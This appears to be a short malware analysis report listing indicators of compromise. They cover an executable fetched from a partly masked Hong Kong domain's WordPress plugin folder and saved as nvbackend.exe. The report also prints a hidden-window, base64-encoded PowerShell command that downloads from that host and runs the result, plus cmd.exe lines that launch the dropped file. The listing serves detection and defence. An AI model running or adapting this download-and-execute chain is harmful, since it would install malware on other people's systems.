Technical Information
- http://ma###as.com.hk/wp-content/plugins/freedom/_sec/berg.exe as %temp%\nvbackend.exe
- http://ma###as.com.hk/wp-content/plugins/freedom/_sec/berg.exe
- DNS ASK ma###as.com.hk
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -w 1 -e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABlACgAIgBoAHQAdABwADoALwAvAG0AYQB0AHQAYwBhAHMALgBjAG8AbQAuAGgAawAv...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c %temp%\nvbackend.exe (with hidden window)
- '<SYSTEM32>\cmd.exe' /c %temp%\nvbackend.exe